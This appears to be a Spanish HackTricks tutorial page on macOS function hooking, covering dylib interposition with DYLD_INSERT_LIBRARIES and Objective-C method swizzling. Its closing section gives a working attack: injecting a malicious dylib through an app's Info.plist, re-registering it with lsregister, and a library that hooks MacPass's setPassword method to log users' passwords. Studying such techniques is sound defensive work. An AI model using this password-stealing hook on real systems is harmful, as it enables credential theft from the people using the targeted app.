# Hooking de funciones en macOS

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

* ¿Trabajas en una **empresa de ciberseguridad**? ¿Quieres ver tu **empresa anunciada en HackTricks**? ¿O quieres tener acceso a la **última versión de PEASS o descargar HackTricks en PDF**? ¡Consulta los [**PLANES DE SUSCRIPCIÓN**](https://github.com/sponsors/carlospolop)! * Descubre [**The PEASS Family**](https://opensea.io/collection/the-peass-family), nuestra colección exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family) * Obtén el [**merchandising oficial de PEASS y HackTricks**](https://peass.creator-spring.com) * **Únete al** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo de Discord**](https://discord.gg/hRep4RUj7f) o al [**grupo de Telegram**](https://t.me/peass) o **sígueme** en **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.** * **Comparte tus trucos de hacking enviando PRs al** [**repositorio de hacktricks**](https://github.com/carlospolop/hacktricks) **y al** [**repositorio de hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).

## Interposición de funciones Crea una **dylib** con una sección **`__interpose`** (o una sección marcada con **`S_INTERPOSING`**) que contenga tuplas de **punteros a funciones** que se refieran a las funciones **originales** y a las funciones **de reemplazo**. Luego, **inyecta** la dylib con **`DYLD_INSERT_LIBRARIES`** (la interposición debe ocurrir antes de que la aplicación principal se cargue). Obviamente, las [**restricciones** aplicadas al uso de **`DYLD_INSERT_LIBRARIES`** también se aplican aquí](../macos-proces-abuse/macos-library-injection/#check-restrictions). ### Interponer printf {% tabs %} {% tab title="interpose.c" %} {% code title="interpose.c" %} ```c // gcc -dynamiclib interpose.c -o interpose.dylib #include #include int my_printf(const char *format, ...) { //va_list args; //va_start(args, format); //int ret = vprintf(format, args); //va_end(args); int ret = printf("Hello from interpose\n"); return ret; } __attribute__((used)) static struct { const void *replacement; const void *replacee; } _interpose_printf __attribute__ ((section ("__DATA,__interpose"))) = { (const void *)(unsigned long)&my_printf, (const void *)(unsigned long)&printf }; ``` {% tab title="hello.c" %} ```c //gcc hello.c -o hello #include int main() { printf("Hello World!\n"); return 0; } ``` ```c #include #include #include typedef int (*orig_open_type)(const char *pathname, int flags); typedef FILE *(*orig_fopen_type)(const char *pathname, const char *mode); int open(const char *pathname, int flags) { orig_open_type orig_open; orig_open = (orig_open_type)dlsym(RTLD_NEXT, "open"); printf("Opening file: %s\n", pathname); return orig_open(pathname, flags); } FILE *fopen(const char *pathname, const char *mode) { orig_fopen_type orig_fopen; orig_fopen = (orig_fopen_type)dlsym(RTLD_NEXT, "fopen"); printf("Opening file: %s\n", pathname); return orig_fopen(pathname, mode); } ``` Este es un ejemplo de código en C que muestra cómo realizar el hooking de funciones en macOS. El código utiliza la función `dlsym` de la biblioteca `dlfcn.h` para obtener un puntero a la función original que se va a interponer. Luego, se imprime un mensaje indicando que se está abriendo un archivo y se llama a la función original utilizando el puntero obtenido. En el caso de la función `open`, se define un tipo de puntero a función `orig_open_type` que toma los mismos argumentos y devuelve el mismo tipo de valor que la función original. Se declara una variable `orig_open` de este tipo y se le asigna el valor obtenido mediante `dlsym`. Luego, se imprime el nombre del archivo que se está abriendo y se llama a la función original utilizando el puntero `orig_open`. En el caso de la función `fopen`, se sigue el mismo proceso que en el caso de `open`, pero utilizando un tipo de puntero a función `orig_fopen_type` y una variable `orig_fopen`. Este código puede ser compilado como una biblioteca compartida y cargado en un proceso en ejecución utilizando la variable de entorno `DYLD_INSERT_LIBRARIES`. Una vez cargado, el código interpondrá las funciones `open` y `fopen`, imprimiendo un mensaje cada vez que se llamen. Esto puede ser útil para realizar análisis de comportamiento de aplicaciones o para realizar modificaciones en tiempo de ejecución. ```c // Just another way to define an interpose // gcc -dynamiclib interpose2.c -o interpose2.dylib #include #define DYLD_INTERPOSE(_replacement, _replacee) \ __attribute__((used)) static struct { \ const void* replacement; \ const void* replacee; \ } _interpose_##_replacee __attribute__ ((section("__DATA, __interpose"))) = { \ (const void*) (unsigned long) &_replacement, \ (const void*) (unsigned long) &_replacee \ }; int my_printf(const char *format, ...) { int ret = printf("Hello from interpose\n"); return ret; } DYLD_INTERPOSE(my_printf,printf); ``` {% endtab %} {% endtabs %} ```bash DYLD_INSERT_LIBRARIES=./interpose.dylib ./hello Hello from interpose DYLD_INSERT_LIBRARIES=./interpose2.dylib ./hello Hello from interpose ``` ## Método Swizzling En ObjectiveC, así es como se llama a un método: **`[instanciaDeMiClase nombreDelMetodoPrimerParam:param1 segundoParam:param2]`** Se necesita el **objeto**, el **método** y los **parámetros**. Y cuando se llama a un método, se envía un **mensaje** utilizando la función **`objc_msgSend`**: `int i = ((int (*)(id, SEL, NSString *, NSString *))objc_msgSend)(someObject, @selector(method1p1:p2:), value1, value2);` El objeto es **`someObject`**, el método es **`@selector(method1p1:p2:)`** y los argumentos son **value1**, **value2**. Siguiendo las estructuras de objetos, es posible llegar a una **matriz de métodos** donde se encuentran los **nombres** y **punteros** al código del método. {% hint style="danger" %} Ten en cuenta que debido a que los métodos y las clases se acceden en función de sus nombres, esta información se almacena en el binario, por lo que es posible recuperarla con `otool -ov ` o [`class-dump `](https://github.com/nygard/class-dump) {% endhint %} ### Accediendo a los métodos en bruto Es posible acceder a la información de los métodos, como el nombre, el número de parámetros o la dirección, como en el siguiente ejemplo: ```objectivec // gcc -framework Foundation test.m -o test #import #import #import int main() { // Get class of the variable NSString* str = @"This is an example"; Class strClass = [str class]; NSLog(@"str's Class name: %s", class_getName(strClass)); // Get parent class of a class Class strSuper = class_getSuperclass(strClass); NSLog(@"Superclass name: %@",NSStringFromClass(strSuper)); // Get information about a method SEL sel = @selector(length); NSLog(@"Selector name: %@", NSStringFromSelector(sel)); Method m = class_getInstanceMethod(strClass,sel); NSLog(@"Number of arguments: %d", method_getNumberOfArguments(m)); NSLog(@"Implementation address: 0x%lx", (unsigned long)method_getImplementation(m)); // Iterate through the class hierarchy NSLog(@"Listing methods:"); Class currentClass = strClass; while (currentClass != NULL) { unsigned int inheritedMethodCount = 0; Method* inheritedMethods = class_copyMethodList(currentClass, &inheritedMethodCount); NSLog(@"Number of inherited methods in %s: %u", class_getName(currentClass), inheritedMethodCount); for (unsigned int i = 0; i < inheritedMethodCount; i++) { Method method = inheritedMethods[i]; SEL selector = method_getName(method); const char* methodName = sel_getName(selector); unsigned long address = (unsigned long)method_getImplementation(m); NSLog(@"Inherited method name: %s (0x%lx)", methodName, address); } // Free the memory allocated by class_copyMethodList free(inheritedMethods); currentClass = class_getSuperclass(currentClass); } // Other ways to call uppercaseString method if([str respondsToSelector:@selector(uppercaseString)]) { NSString *uppercaseString = [str performSelector:@selector(uppercaseString)]; NSLog(@"Uppercase string: %@", uppercaseString); } // Using objc_msgSend directly NSString *uppercaseString2 = ((NSString *(*)(id, SEL))objc_msgSend)(str, @selector(uppercaseString)); NSLog(@"Uppercase string: %@", uppercaseString2); // Calling the address directly IMP imp = method_getImplementation(class_getInstanceMethod(strClass, @selector(uppercaseString))); // Get the function address NSString *(*callImp)(id,SEL) = (typeof(callImp))imp; // Generates a function capable to method from imp NSString *uppercaseString3 = callImp(str,@selector(uppercaseString)); // Call the method NSLog(@"Uppercase string: %@", uppercaseString3); return 0; } ``` ### Método Swizzling con method\_exchangeImplementations La función **`method_exchangeImplementations`** permite **cambiar** la **dirección** de la **implementación** de una función por la de otra. {% hint style="danger" %} Por lo tanto, cuando se llama a una función, lo que se **ejecuta es la otra**. {% endhint %} ```objectivec //gcc -framework Foundation swizzle_str.m -o swizzle_str #import #import // Create a new category for NSString with the method to execute @interface NSString (SwizzleString) - (NSString *)swizzledSubstringFromIndex:(NSUInteger)from; @end @implementation NSString (SwizzleString) - (NSString *)swizzledSubstringFromIndex:(NSUInteger)from { NSLog(@"Custom implementation of substringFromIndex:"); // Call the original method return [self swizzledSubstringFromIndex:from]; } @end int main(int argc, const char * argv[]) { // Perform method swizzling Method originalMethod = class_getInstanceMethod([NSString class], @selector(substringFromIndex:)); Method swizzledMethod = class_getInstanceMethod([NSString class], @selector(swizzledSubstringFromIndex:)); method_exchangeImplementations(originalMethod, swizzledMethod); // We changed the address of one method for the other // Now when the method substringFromIndex is called, what is really coode is swizzledSubstringFromIndex // And when swizzledSubstringFromIndex is called, substringFromIndex is really colled // Example usage NSString *myString = @"Hello, World!"; NSString *subString = [myString substringFromIndex:7]; NSLog(@"Substring: %@", subString); return 0; } ``` {% hint style="warning" %} En este caso, si el **código de implementación del método legítimo** verifica el **nombre del método**, podría **detectar** este intercambio de métodos y evitar que se ejecute. La siguiente técnica no tiene esta restricción. {% endhint %} ### Intercepción de métodos con method\_setImplementation El formato anterior es extraño porque estás cambiando la implementación de 2 métodos uno por el otro. Usando la función **`method_setImplementation`**, puedes **cambiar** la **implementación** de un **método por otro**. Solo recuerda **almacenar la dirección de la implementación del original** si vas a llamarlo desde la nueva implementación antes de sobrescribirlo, ya que luego será mucho más complicado localizar esa dirección. ```objectivec #import #import #import static IMP original_substringFromIndex = NULL; @interface NSString (Swizzlestring) - (NSString *)swizzledSubstringFromIndex:(NSUInteger)from; @end @implementation NSString (Swizzlestring) - (NSString *)swizzledSubstringFromIndex:(NSUInteger)from { NSLog(@"Custom implementation of substringFromIndex:"); // Call the original implementation using objc_msgSendSuper return ((NSString *(*)(id, SEL, NSUInteger))original_substringFromIndex)(self, _cmd, from); } @end int main(int argc, const char * argv[]) { @autoreleasepool { // Get the class of the target method Class stringClass = [NSString class]; // Get the swizzled and original methods Method originalMethod = class_getInstanceMethod(stringClass, @selector(substringFromIndex:)); // Get the function pointer to the swizzled method's implementation IMP swizzledIMP = method_getImplementation(class_getInstanceMethod(stringClass, @selector(swizzledSubstringFromIndex:))); // Swap the implementations // It return the now overwritten implementation of the original method to store it original_substringFromIndex = method_setImplementation(originalMethod, swizzledIMP); // Example usage NSString *myString = @"Hello, World!"; NSString *subString = [myString substringFromIndex:7]; NSLog(@"Substring: %@", subString); // Set the original implementation back method_setImplementation(originalMethod, original_substringFromIndex); return 0; } } ``` ## Metodología de Ataque de Hooking En esta página se discuten diferentes formas de enganchar funciones. Sin embargo, todas ellas implican **ejecutar código dentro del proceso para atacar**. La técnica más sencilla para lograr esto es inyectar un [Dyld a través de variables de entorno o secuestro](../macos-dyld-hijacking-and-dyld\_insert\_libraries.md). Sin embargo, supongo que también se podría hacer mediante [inyección de proceso Dylib](macos-ipc-inter-process-communication/#dylib-process-injection-via-task-port). Ambas opciones están **limitadas** a binarios/procesos **no protegidos**. Consulta cada técnica para obtener más información sobre las limitaciones. Sin embargo, un ataque de enganche de funciones es muy específico, un atacante lo haría para **robar información sensible desde dentro de un proceso** (si no, simplemente se haría un ataque de inyección de proceso). Y esta información sensible podría estar ubicada en aplicaciones descargadas por el usuario, como MacPass. Por lo tanto, el vector de ataque sería encontrar una vulnerabilidad o eliminar la firma de la aplicación, e inyectar la variable de entorno **`DYLD_INSERT_LIBRARIES`** a través del archivo Info.plist de la aplicación, agregando algo como: ```xml LSEnvironment DYLD_INSERT_LIBRARIES /Applications/Application.app/Contents/malicious.dylib ``` y luego **vuelva a registrar** la aplicación: {% code overflow="wrap" %} ```bash /System/Library/Frameworks/CoreServices.framework/Frameworks/LaunchServices.framework/Support/lsregister -f /Applications/Application.app ``` {% endcode %} Agrega en esa biblioteca el código de hooking para exfiltrar la información: contraseñas, mensajes... {% hint style="danger" %} Ten en cuenta que en las versiones más recientes de macOS, si **eliminas la firma** del binario de la aplicación y esta se ejecutó previamente, macOS **ya no ejecutará la aplicación**. {% endhint %} #### Ejemplo de biblioteca ```objectivec // gcc -dynamiclib -framework Foundation sniff.m -o sniff.dylib // If you added env vars in the Info.plist don't forget to call lsregister as explained before // Listen to the logs with something like: // log stream --style syslog --predicate 'eventMessage CONTAINS[c] "Password"' #include #import // Here will be stored the real method (setPassword in this case) address static IMP real_setPassword = NULL; static BOOL custom_setPassword(id self, SEL _cmd, NSString* password, NSURL* keyFileURL) { // Function that will log the password and call the original setPassword(pass, file_path) method NSLog(@"[+] Password is: %@", password); // After logging the password call the original method so nothing breaks. return ((BOOL (*)(id,SEL,NSString*, NSURL*))real_setPassword)(self, _cmd, password, keyFileURL); } // Library constructor to execute __attribute__((constructor)) static void customConstructor(int argc, const char **argv) { // Get the real method address to not lose it Class classMPDocument = NSClassFromString(@"MPDocument"); Method real_Method = class_getInstanceMethod(classMPDocument, @selector(setPassword:keyFileURL:)); // Make the original method setPassword call the fake implementation one IMP fake_IMP = (IMP)custom_setPassword; real_setPassword = method_setImplementation(real_Method, fake_IMP); } ``` ## Referencias * [https://nshipster.com/method-swizzling/](https://nshipster.com/method-swizzling/)

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥